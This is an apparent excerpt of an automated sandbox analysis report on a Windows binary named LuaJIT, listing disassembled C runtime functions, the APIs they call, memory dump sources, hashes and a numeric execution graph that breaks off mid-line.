                                                                                                                                                                        • Opcode ID: 387e11f8245d893e7837b6b120787469813fd98f0c27da7d10021a3758a5c228
                                                                                                                                                                        • Instruction ID: 94e2f5de8847c742d57fa8995251f467fa7a8ae5de84a5f7b0b08c1cc22ae2dc
                                                                                                                                                                        • Opcode Fuzzy Hash: 387e11f8245d893e7837b6b120787469813fd98f0c27da7d10021a3758a5c228
                                                                                                                                                                        • Instruction Fuzzy Hash: 82F0E953F0C587A1EB147B51B5805B8D2A26F4C7D0FC44035D91D42665CF3EE444E76B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B09AC8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09AF9
                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF738B0D7C2,?,?,00000000,00007FF738B0D6BA,?,?,?,00007FF738AFB0BD), ref: 00007FF738B09B13
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                                                                        • String ID: InitializeCriticalSectionEx
                                                                                                                                                                        • API String ID: 539475747-3084827643
                                                                                                                                                                        • Opcode ID: f593fc07e1f163ed4f1411d2061b7c33e5da13f5e8e1107869e134c63be22fec
                                                                                                                                                                        • Instruction ID: 9d7ef7f009edc5334dcf183403b319b8c2d5b46a2c978bf3fb0206e9d68fe699
                                                                                                                                                                        • Opcode Fuzzy Hash: f593fc07e1f163ed4f1411d2061b7c33e5da13f5e8e1107869e134c63be22fec
                                                                                                                                                                        • Instruction Fuzzy Hash: A3F0B423B18BC7A1EA14AB41F4404A9E220FF48BD0FC44031E91D03B54CF3EE854D76A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B09828 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09851
                                                                                                                                                                        • TlsSetValue.KERNEL32(?,?,?,00007FF738B0AB66,?,?,?,00007FF738AFAF01,?,?,?,?,00007FF738B102A3), ref: 00007FF738B09868
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Valuetry_get_function
                                                                                                                                                                        • String ID: FlsSetValue
                                                                                                                                                                        • API String ID: 738293619-3750699315
                                                                                                                                                                        • Opcode ID: 1d949419f1085bf99280a0a61ab6c09fbe3545b5b27d1b3e881a82ebf7306659
                                                                                                                                                                        • Instruction ID: 7cd4420f1607cb87434e53ad074cd3e32d237b050a49f23b8ec12ca827e11c51
                                                                                                                                                                        • Opcode Fuzzy Hash: 1d949419f1085bf99280a0a61ab6c09fbe3545b5b27d1b3e881a82ebf7306659
                                                                                                                                                                        • Instruction Fuzzy Hash: DBE06563A08687B1EA04BB51E4454B9E222AF487C1FC84035D92D06395CE3EE454E32B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A5DEF0 Relevance: 5.1, APIs: 4, Instructions: 62COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF738A4348C), ref: 00007FF738A5DF1F
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF738A4348C), ref: 00007FF738A5DF83
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF738A4348C), ref: 00007FF738A5DFB9
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF738A4348C), ref: 00007FF738A5E003
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                        • Opcode ID: d7064577febaf475c7bb8ae2d0a4322ba4b58d71bdf70b5fad720353a296914f
                                                                                                                                                                        • Instruction ID: 2297dba5d179ac2145c004c8809ef93dec2cfeaf676bbb3a88d0ae468deac050
                                                                                                                                                                        • Opcode Fuzzy Hash: d7064577febaf475c7bb8ae2d0a4322ba4b58d71bdf70b5fad720353a296914f
                                                                                                                                                                        • Instruction Fuzzy Hash: 34310D37619B8586DB609B2AE45166AFBA0F798B98F040166EECD47B25CE3CC1448B14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:3.1%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                        Total number of Nodes:1305
                                                                                                                                                                        Total number of Limit Nodes:29
                                                                                                                                                                        execution_graph 75466 7ff6fdfd1d44 75467 7ff6fdfd1d62 75466->75467 75469 7ff6fdfec5a0 75467->75469 75472 7ff6fdfedff0 75469->75472 75471 7ff6fdfec5c5 wcsxfrm 75471->75467 75473 7ff6fdfee0cc 75472->75473 75474 7ff6fdfee00d 75472->75474 75475 7ff6fdfe8da0 wcsxfrm 94 API calls 75473->75475 75474->75473 75476 7ff6fdfee023 75474->75476 75477 7ff6fdfee0db 75475->75477 75485 7ff6fdfe8da0 75476->75485 75479 7ff6fdfee03c 75477->75479 75481 7ff6fdfee17d 75477->75481 75490 7ff6fdfe0950 94 API calls strrchr 75477->75490 75480 7ff6fdfee1c7 75479->75480 75496 7ff6fdfede50 94 API calls 2 library calls 75479->75496 75480->75471 75491 7ff6fdfe8d00 75481->75491 75497 7ff6fdff8b40 75485->75497 75487 7ff6fdfe8ded 75487->75479 75490->75481 75494 7ff6fdfe8d45 75491->75494 75495 7ff6fdff8b40 10 API calls 75491->75495 75492 7ff6fdfe8d64 75492->75479 75494->75492 75551 7ff6fdfe0690 94 API calls 2 library calls 75494->75551 75495->75494 75496->75480 75498 7ff6fdff8b73 75497->75498 75499 7ff6fdff8b60 75497->75499 75501 7ff6fdff8b8e 75498->75501 75502 7ff6fdff8b7b 75498->75502 75507 7ff6fdffca40 75499->75507 75521 7ff6fdffd9e0 75501->75521 75517 7ff6fdffc230 75502->75517 75505 7ff6fdfe8dd6 75505->75487 75506 7ff6fdfe0690 94 API calls 2 library calls 75505->75506 75506->75487 75508 7ff6fdffca60 75507->75508 75512 7ff6fdffcb15 75507->75512 75509 7ff6fdffcad6 75508->75509 75513 7ff6fdffcb21 75508->75513 75529 7ff6fdff8c90 GetLastError 75509->75529 75511 7ff6fdffcfc2 75511->75512 75535 7ff6fdffaf30 GetLastError VirtualQuery VirtualFree SetLastError 75511->75535 75512->75505 75513->75511 75513->75512 75516 7ff6fdffd074 75513->75516 75516->75512 75536 7ff6fdffa720 GetLastError VirtualQuery VirtualFree SetLastError 75516->75536 75520 7ff6fdffc260 75517->75520 75518 7ff6fdffc2e0 75518->75505 75520->75518 75537 7ff6fdffa3f0 75520->75537 75522 7ff6fdffda01 75521->75522 75524 7ff6fdffda0d 75521->75524 75522->75505 75523 7ff6fdffdab6 75523->75522 75526 7ff6fdffc230 6 API calls 75523->75526 75524->75523 75525 7ff6fdffca40 4 API calls 75524->75525 75525->75523 75527 7ff6fdffdcff memcpy_s 75526->75527 75527->75522 75528 7ff6fdffca40 4 API calls 75527->75528 75528->75522 75532 7ff6fdff8cb2 75529->75532 75530 7ff6fdff8d65 SetLastError 75534 7ff6fdff8cd9 75530->75534 75531 7ff6fdff8cbe VirtualQuery 75531->75532 75531->75534 75532->75530 75532->75531 75533 7ff6fdff8d18 VirtualFree 75532->75533 75532->75534 75533->75532 75533->75534 75534->75512 75535->75512 75536->75512 75538 7ff6fdffa421 75537->75538 75541 7ff6fdffa436 75537->75541 75543 7ff6fdff8e60 75538->75543 75542 7ff6fdffa443 75541->75542 75547 7ff6fdff8bb0 GetLastError VirtualAlloc SetLastError 75541->75547 75542->75518 75544 7ff6fdff8e94 75543->75544 75546 7ff6fdff8e9e 75543->75546 75549 7ff6fdff8c20 GetLastError VirtualAlloc SetLastError 75544->75549 75546->75541 75548 7ff6fdff8bf3 75547->75548 75548->75542 75550 7ff6fdff8c63 75549->75550 75550->75546 75551->75492 75552 7ff6fe09ac60 75553 7ff6fe09acc7 75552->75553 75554 7ff6fe09ac7d GetModuleHandleW 75552->75554 75562 7ff6fe09ab58 75553->75562 75554->75553 75560 7ff6fe09ac8a 75554->75560 75557 7ff6fe09ad09 75559 7ff6fe09ad1b 75560->75553 75576 7ff6fe09ad68 GetModuleHandleExW 75560->75576 75582 7ff6fe0a91ac EnterCriticalSection 75562->75582 75564 7ff6fe09ab74 75565 7ff6fe09ab90 14 API calls 75564->75565 75566 7ff6fe09ab7d 75565->75566 75567 7ff6fe0a9200 _isindst LeaveCriticalSection 75566->75567 75568 7ff6fe09ab85 75567->75568 75568->75557 75569 7ff6fe09ad1c 75568->75569 75583 7ff6fe0ad484 75569->75583 75572 7ff6fe09ad56 75574 7ff6fe09ad68 3 API calls 75572->75574 75573 7ff6fe09ad45 GetCurrentProcess TerminateProcess 75573->75572 75575 7ff6fe09ad5d ExitProcess 75574->75575 75577 7ff6fe09ad8e GetProcAddress 75576->75577 75578 7ff6fe09adad 75576->75578 75577->75578 75579 7ff6fe09ada5 75577->75579 75580 7ff6fe09adb7 FreeLibrary 75578->75580 75581 7ff6fe09adbd 75578->75581 75579->75578 75580->75581 75581->75553 75584 7ff6fe0ad4a2 75583->75584 75585 7ff6fe09ad29 75583->75585 75587 7ff6fe0a9550 75584->75587 75585->75572 75585->75573 75590 7ff6fe0a9378 75587->75590 75591 7ff6fe0a93d9 75590->75591 75598 7ff6fe0a93d4 try_get_function 75590->75598 75591->75585 75592 7ff6fe0a94bc 75592->75591 75595 7ff6fe0a94ca GetProcAddress 75592->75595 75593 7ff6fe0a9408 LoadLibraryW 75594 7ff6fe0a9429 GetLastError 75593->75594 75593->75598 75594->75598 75596 7ff6fe0a94db 75595->75596 75596->75591 75597 7ff6fe0a94a1 FreeLibrary 75597->75598 75598->75591 75598->75592 75598->75593 75598->75597 75599 7ff6fe0a9463 LoadLibraryExW 75598->75599 75599->75598 75600 7ff6fdfd2c6e 75601 7ff6fdfd2ca4 75600->75601 75602 7ff6fdfd2e9e 75600->75602 75631 7ff6fe020300 75601->75631 75635 7ff6fe021750 75601->75635 75640 7ff6fdfd6950 75601->75640 75679 7ff6fe01f900 75601->75679 75691 7ff6fdfdaca0 75602->75691 75605 7ff6fdfd2cb0 75612 7ff6fdfd2dd7 75605->75612 75614 7ff6fdfd2d98 75605->75614 75618 7ff6fdfd273d 75605->75618 75621 7ff6fdfd3098 75605->75621 75607 7ff6fdfd4ac4 75608 7ff6fdfd348c 75737 7ff6fdff0f90 94 API calls 2 library calls 75608->75737 75609 7ff6fdfd4978 75740 7ff6fe0270e0 96 API calls 75609->75740 75612->75608 75699 7ff6fdfe4490 75612->75699 75713 7ff6fdff64e4 75612->75713 75718 7ff6fdfdb3d0 75612->75718 75613 7ff6fdfd5066 75614->75612 75617 7ff6fdfdaca0 _free_nolock 94 API calls 75614->75617 75615 7ff6fdfdaca0 _free_nolock 94 API calls 75615->75621 75616 7ff6fdfd2420 75617->75614 75618->75618 75618->75621 75623 7ff6fdfdaca0 _free_nolock 94 API calls 75618->75623 75738 7ff6fdfd2420 96 API calls 2 library calls 75618->75738 75739 7ff6fe011b70 94 API calls 2 library calls 75618->75739 75620 7ff6fdfd4941 75621->75609 75621->75615 75621->75620 75623->75618 75632 7ff6fe020377 75631->75632 75633 7ff6fe020327 75631->75633 75632->75605 75633->75632 75741 7ff6fe05ee10 75633->75741 75750 7ff6fe025910 75635->75750 75641 7ff6fdfd698b 75640->75641 75642 7ff6fdfd69a5 75641->75642 75643 7ff6fdfd69bd 75641->75643 75830 7ff6fdfd51e0 59 API calls _wcsupr_s 75642->75830 75644 7ff6fdfd69ed 75643->75644 75831 7ff6fdfdcb50 94 API calls _free_nolock 75643->75831 75776 7ff6fdfe8020 75644->75776 75647 7ff6fdfd69d7 75832 7ff6fdfdd5e0 75647->75832 75650 7ff6fdfd6a06 75789 7ff6fdfd5690 75650->75789 75653 7ff6fdfd6a4d 75654 7ff6fdfd6a77 75653->75654 75666 7ff6fdfd69aa 75653->75666 75841 7ff6fdfd5500 57 API calls _wcsupr_s 75653->75841 75797 7ff6fdfd66b0 75654->75797 75659 7ff6fdfd6ace 75661 7ff6fdfd6af0 75659->75661 75665 7ff6fdfd6b06 _wcsupr_s 75659->75665 75659->75666 75842 7ff6fdfd5530 94 API calls 2 library calls 75661->75842 75663 7ff6fdfd6afa 75843 7ff6fdfd5c10 98 API calls 2 library calls 75663->75843 75665->75666 75844 7ff6fe09a1fc 75665->75844 75666->75605 75671 7ff6fdfd6b54 75861 7ff6fdfd5740 117 API calls _wcsupr_s 75671->75861 75672 7ff6fdfd6b39 75858 7ff6fdfd5500 57 API calls _wcsupr_s 75672->75858 75675 7ff6fdfd6b3e 75859 7ff6fdfd5530 94 API calls 2 library calls 75675->75859 75677 7ff6fdfd6b48 75860 7ff6fdfd5c10 98 API calls 2 library calls 75677->75860 75680 7ff6fe01f913 __ExceptionPtrDestroy 75679->75680 76314 7ff6fe01edf0 75680->76314 75684 7ff6fe01f94f __ExceptionPtrDestroy 75685 7ff6fe01f97f 75684->75685 75686 7ff6fe01fa1b 75684->75686 76328 7ff6fdff2250 94 API calls 2 library calls 75684->76328 75685->75605 76330 7ff6fe01f5c0 96 API calls 4 library calls 75686->76330 75689 7ff6fe01fa05 75689->75686 76329 7ff6fdfe0fa0 94 API calls std::rsfun 75689->76329 75692 7ff6fdfdacbb 75691->75692 75695 7ff6fdfdacca 75691->75695 76369 7ff6fdfe0600 5 API calls _free_nolock 75692->76369 76366 7ff6fdfdaed0 75695->76366 75697 7ff6fdfd2ed0 75723 7ff6fdfe30a0 75697->75723 76371 7ff6fdff7170 75699->76371 75701 7ff6fdfe456d 75703 7ff6fdfe4585 75701->75703 75704 7ff6fdfe4574 75701->75704 75702 7ff6fdfe44cf _free_nolock 75702->75701 76398 7ff6fdfe05a0 94 API calls 2 library calls 75702->76398 76400 7ff6fe006200 94 API calls 5 library calls 75703->76400 76384 7ff6fe004c00 75704->76384 75707 7ff6fdfe457e 76401 7ff6fdfeeae0 94 API calls 75707->76401 75709 7ff6fdfe45b6 75709->75612 75711 7ff6fdfe454c 76399 7ff6fdfe0600 5 API calls _free_nolock 75711->76399 76490 7ff6fe03a950 75713->76490 75715 7ff6fdff6505 76516 7ff6fdff5590 75715->76516 75717 7ff6fdff650f 75717->75612 76606 7ff6fdfe8450 75718->76606 75724 7ff6fe09aef8 _set_fmode 14 API calls 75723->75724 75725 7ff6fdfe30b3 GetLastError 75724->75725 76631 7ff6fdfe3ca0 75725->76631 75728 7ff6fdfe3132 76641 7ff6fdff40a0 96 API calls _set_fmode 75728->76641 75729 7ff6fdfe3156 75731 7ff6fdfe318d 75729->75731 76637 7ff6fdff3fc0 75729->76637 75735 7ff6fdfe314f 75731->75735 76642 7ff6fdfe3a80 98 API calls _handle_error 75731->76642 75734 7ff6fe09aef8 _set_fmode 14 API calls 75736 7ff6fdfe3294 SetLastError 75734->75736 75735->75734 75736->75607 75737->75616 75738->75618 75739->75618 75740->75613 75744 7ff6fe05f080 75741->75744 75745 7ff6fe05f0ed 75744->75745 75749 7ff6fe05f094 75744->75749 75746 7ff6fe05ee23 75745->75746 75747 7ff6fe05f0f8 FreeLibrary 75745->75747 75746->75632 75747->75746 75748 7ff6fe05f0cb FreeLibrary 75748->75749 75749->75746 75749->75748 75751 7ff6fe02598f _free_nolock 75750->75751 75754 7ff6fe025945 75750->75754 75753 7ff6fe021768 75751->75753 75762 7ff6fdfe1310 94 API calls __ExceptionPtrDestroy 75751->75762 75756 7ff6fe05eda0 75753->75756 75754->75751 75754->75753 75761 7ff6fe002a30 94 API calls type_info::_name_internal_method 75754->75761 75763 7ff6fe05f000 GetLastError 75756->75763 75758 7ff6fe05edd3 75769 7ff6fe05f340 94 API calls 2 library calls 75758->75769 75760 7ff6fe0217e7 75760->75605 75761->75751 75762->75753 75770 7ff6fe05efa0 75763->75770 75766 7ff6fe05f05d SetLastError 75766->75758 75767 7ff6fe05f047 75774 7ff6fe05ee80 96 API calls 2 library calls 75767->75774 75769->75760 75771 7ff6fe05efb8 75770->75771 75772 7ff6fe05efd2 LoadLibraryExA 75771->75772 75775 7ff6fe003010 94 API calls std::rsfun 75771->75775 75772->75766 75772->75767 75774->75766 75775->75772 75780 7ff6fdfe8037 75776->75780 75777 7ff6fdfe808d 75862 7ff6fdfe4b70 75777->75862 75780->75777 75877 7ff6fdfdca10 75780->75877 75883 7ff6fdfdc860 94 API calls 4 library calls 75780->75883 75884 7ff6fdfddce0 94 API calls strrchr 75780->75884 75781 7ff6fdfe80a9 75783 7ff6fdfe8100 75781->75783 75784 7ff6fdfdca10 task 94 API calls 75781->75784 75788 7ff6fdfdd5e0 wcsxfrm 94 API calls 75781->75788 75873 7ff6fdfdb4e0 75783->75873 75784->75781 75787 7ff6fdfe810f 75787->75650 75788->75781 75790 7ff6fdfdd0c0 wcsxfrm 94 API calls 75789->75790 75796 7ff6fdfd56c5 75790->75796 75791 7ff6fdfd571b 75793 7ff6fdfdd5e0 wcsxfrm 94 API calls 75791->75793 75794 7ff6fdfd5731 75793->75794 75794->75653 75840 7ff6fdfd68d0 117 API calls 75794->75840 75796->75791 75906 7ff6fdfdc860 94 API calls 4 library calls 75796->75906 75907 7ff6fdfdd7d0 94 API calls 2 library calls 75796->75907 75798 7ff6fdfd66cd 75797->75798 75799 7ff6fdfd6872 75798->75799 75800 7ff6fdfd6722 75798->75800 75806 7ff6fdfd6746 75798->75806 75911 7ff6fdfd6230 96 API calls wcsxfrm 75799->75911 75802 7ff6fdfd689e 75800->75802 75803 7ff6fdfd672d 75800->75803 75912 7ff6fdfd62c0 96 API calls _free_nolock 75802->75912 75804 7ff6fdfd6734 75803->75804 75805 7ff6fdfd674b 75803->75805 75808 7ff6fdfd673f 75804->75808 75809 7ff6fdfd6816 75804->75809 75908 7ff6fdfd57b0 98 API calls 2 library calls 75805->75908 75806->75659 75806->75666 75813 7ff6fdfd5d60 75806->75813 75808->75806 75909 7ff6fdfd5840 98 API calls 2 library calls 75808->75909 75910 7ff6fdfd60e0 96 API calls 3 library calls 75809->75910 75814 7ff6fdfd5d96 75813->75814 75913 7ff6fdfe3f90 75814->75913 75817 7ff6fdfd5e96 75937 7ff6fdfd5300 75817->75937 75820 7ff6fdfd5e01 wcsxfrm 75822 7ff6fdfd5e15 wcsxfrm 75820->75822 75823 7ff6fdfd5e76 75820->75823 75827 7ff6fdfd5e49 75822->75827 75936 7ff6fdfdcfa0 94 API calls 2 library calls 75822->75936 75825 7ff6fdfdb4e0 wcsxfrm 94 API calls 75823->75825 75829 7ff6fdfd5e58 wcsxfrm 75825->75829 75828 7ff6fdfdb4e0 wcsxfrm 94 API calls 75827->75828 75828->75829 75926 7ff6fdfd5430 75829->75926 75830->75666 75831->75647 75833 7ff6fdfdd600 std::rsfun wcsxfrm 75832->75833 75834 7ff6fdfeb7a0 type_info::_name_internal_method 94 API calls 75833->75834 75835 7ff6fdfdd621 _free_nolock 75834->75835 76292 7ff6fdfef8b0 75835->76292 75837 7ff6fdfdd647 _free_nolock 75838 7ff6fdfdd654 _free_nolock 75837->75838 76306 7ff6fdfd2420 94 API calls strrchr 75837->76306 75838->75644 75840->75653 75841->75654 75842->75663 75843->75666 75845 7ff6fe09a205 75844->75845 75846 7ff6fdfd6b2e 75844->75846 75847 7ff6fe09aef8 _set_fmode 14 API calls 75845->75847 75850 7ff6fe09a548 75846->75850 75848 7ff6fe09a20a 75847->75848 76312 7ff6fe0a8b14 23 API calls _invalid_parameter_noinfo 75848->76312 75851 7ff6fe09a55e 75850->75851 75852 7ff6fe09a551 75850->75852 75854 7ff6fe09aef8 _set_fmode 14 API calls 75851->75854 75855 7ff6fdfd6b35 75851->75855 75853 7ff6fe09aef8 _set_fmode 14 API calls 75852->75853 75853->75855 75856 7ff6fe09a595 75854->75856 75855->75671 75855->75672 76313 7ff6fe0a8b14 23 API calls _invalid_parameter_noinfo 75856->76313 75858->75675 75859->75677 75860->75666 75861->75666 75885 7ff6fdfdb5f0 75862->75885 75864 7ff6fdfdc7a0 94 API calls _free_nolock 75871 7ff6fdfe4b95 std::rsfun wcsxfrm _free_nolock 75864->75871 75865 7ff6fdfdb4e0 wcsxfrm 94 API calls 75865->75871 75866 7ff6fdfe4ca8 75867 7ff6fdfdb4e0 wcsxfrm 94 API calls 75866->75867 75868 7ff6fdfe4cb7 75867->75868 75868->75781 75870 7ff6fdfdb5f0 wcsxfrm 94 API calls 75870->75871 75871->75864 75871->75865 75871->75866 75871->75868 75871->75870 75889 7ff6fdfdd0c0 75871->75889 75895 7ff6fdfdd4e0 94 API calls 3 library calls 75871->75895 75874 7ff6fdfdb563 75873->75874 75875 7ff6fdfdb4f8 75873->75875 75874->75787 75874->75874 75875->75874 75876 7ff6fdfdaca0 _free_nolock 94 API calls 75875->75876 75876->75874 75878 7ff6fdfdca3f task _mbsncpy_s 75877->75878 75902 7ff6fdfeea50 75878->75902 75880 7ff6fdfdca64 task _free_nolock 75881 7ff6fdfdcb36 75880->75881 75905 7ff6fdfdad60 94 API calls _free_nolock 75880->75905 75881->75780 75883->75780 75884->75780 75886 7ff6fdfdb60b wcsxfrm _free_nolock 75885->75886 75887 7ff6fdfdb65b 75886->75887 75896 7ff6fdfdad60 94 API calls _free_nolock 75886->75896 75887->75871 75890 7ff6fdfdd0ee _mbsncpy_s 75889->75890 75897 7ff6fdfec600 75890->75897 75892 7ff6fdfdd10b wcsxfrm 75893 7ff6fdfdd15b 75892->75893 75901 7ff6fdfdad60 94 API calls _free_nolock 75892->75901 75893->75871 75895->75871 75896->75887 75898 7ff6fdfec619 wcsxfrm 75897->75898 75899 7ff6fdfec5a0 wcsxfrm 94 API calls 75898->75899 75900 7ff6fdfec67d 75899->75900 75900->75892 75901->75893 75903 7ff6fdfe8da0 wcsxfrm 94 API calls 75902->75903 75904 7ff6fdfeea7b 75903->75904 75904->75880 75905->75881 75906->75796 75907->75796 75908->75806 75909->75806 75910->75806 75911->75806 75912->75806 75945 7ff6fdfe4050 75913->75945 75915 7ff6fdfd5dd4 75915->75817 75916 7ff6fdfdcde0 75915->75916 75917 7ff6fdfdce00 std::rsfun wcsxfrm 75916->75917 76221 7ff6fdfeb7a0 75917->76221 75919 7ff6fdfdce21 _free_nolock 76230 7ff6fdfef6e0 75919->76230 75921 7ff6fdfdce47 75923 7ff6fdfdce8a _free_nolock 75921->75923 76237 7ff6fdfd2420 94 API calls strrchr 75921->76237 75924 7ff6fdfdcf04 75923->75924 76238 7ff6fdfdad60 94 API calls _free_nolock 75923->76238 75924->75820 75927 7ff6fdfd544c 75926->75927 75928 7ff6fdfdca10 task 94 API calls 75927->75928 75929 7ff6fdfd5468 wcsxfrm 75928->75929 76249 7ff6fe09a97c 75929->76249 75934 7ff6fe09a97c 17 API calls 75935 7ff6fdfd54c8 wcsxfrm 75934->75935 75935->75817 75936->75822 75938 7ff6fdfd536b 75937->75938 75939 7ff6fdfd5314 wcsxfrm 75937->75939 75938->75659 75939->75938 76290 7ff6fdfdc230 94 API calls 4 library calls 75939->76290 75941 7ff6fdfd5339 76291 7ff6fdfd5250 60 API calls _wcsupr_s 75941->76291 75943 7ff6fdfd535c 75944 7ff6fdfdb4e0 wcsxfrm 94 API calls 75943->75944 75944->75938 75946 7ff6fdfe4083 75945->75946 75949 7ff6fdfe40f5 _wcsupr_s 75945->75949 75973 7ff6fe09b114 75946->75973 75992 7ff6fdfe3e80 75949->75992 75950 7ff6fdfe40a4 76016 7ff6fe09aef8 75950->76016 75951 7ff6fdfe40d9 76021 7ff6fdfdc990 94 API calls 2 library calls 75951->76021 75955 7ff6fdfe413f 75998 7ff6fe09b02c 75955->75998 75959 7ff6fdfe40b0 76020 7ff6fdfdc990 94 API calls 2 library calls 75959->76020 75962 7ff6fdfe41e3 _wcsupr_s 75971 7ff6fdfe40cf _handle_error 75962->75971 76004 7ff6fe09af9c 75962->76004 75963 7ff6fdfe4155 75964 7ff6fe09aef8 _set_fmode 14 API calls 75963->75964 75965 7ff6fdfe419e 75964->75965 76022 7ff6fe09b448 23 API calls 4 library calls 75965->76022 75968 7ff6fdfe41a5 76023 7ff6fdfdc990 94 API calls 2 library calls 75968->76023 75970 7ff6fdfe41c7 75970->75971 75972 7ff6fe09af9c _wcsupr_s 57 API calls 75970->75972 75971->75915 75972->75971 75976 7ff6fe09b058 75973->75976 75974 7ff6fe09b075 75975 7ff6fe09aef8 _set_fmode 14 API calls 75974->75975 75977 7ff6fe09b07a 75975->75977 75976->75974 75978 7ff6fe09b0a1 75976->75978 76036 7ff6fe0a8b14 23 API calls _invalid_parameter_noinfo 75977->76036 75979 7ff6fe09b0b3 75978->75979 75980 7ff6fe09b0a6 75978->75980 76024 7ff6fe0ad698 75979->76024 75982 7ff6fe09aef8 _set_fmode 14 API calls 75980->75982 75984 7ff6fdfe4097 75982->75984 75984->75950 75984->75951 75986 7ff6fe09b0d4 76031 7ff6fe0adabc 75986->76031 75987 7ff6fe09b0c7 75988 7ff6fe09aef8 _set_fmode 14 API calls 75987->75988 75988->75984 75990 7ff6fe09b0e8 tmpfile 76037 7ff6fe081c84 LeaveCriticalSection 75990->76037 75993 7ff6fdfe3ec6 _mbsncpy_s 75992->75993 76157 7ff6fdfd3037 75993->76157 75995 7ff6fdfe3f2b 76165 7ff6fdff73c0 75995->76165 75997 7ff6fdfe3f41 _mbsncpy_s 75997->75955 75999 7ff6fe09b035 75998->75999 76003 7ff6fdfe414d 75998->76003 76000 7ff6fe09aef8 _set_fmode 14 API calls 75999->76000 76001 7ff6fe09b03a 76000->76001 76179 7ff6fe0a8b14 23 API calls _invalid_parameter_noinfo 76001->76179 76003->75962 76003->75963 76005 7ff6fe09afd1 76004->76005 76006 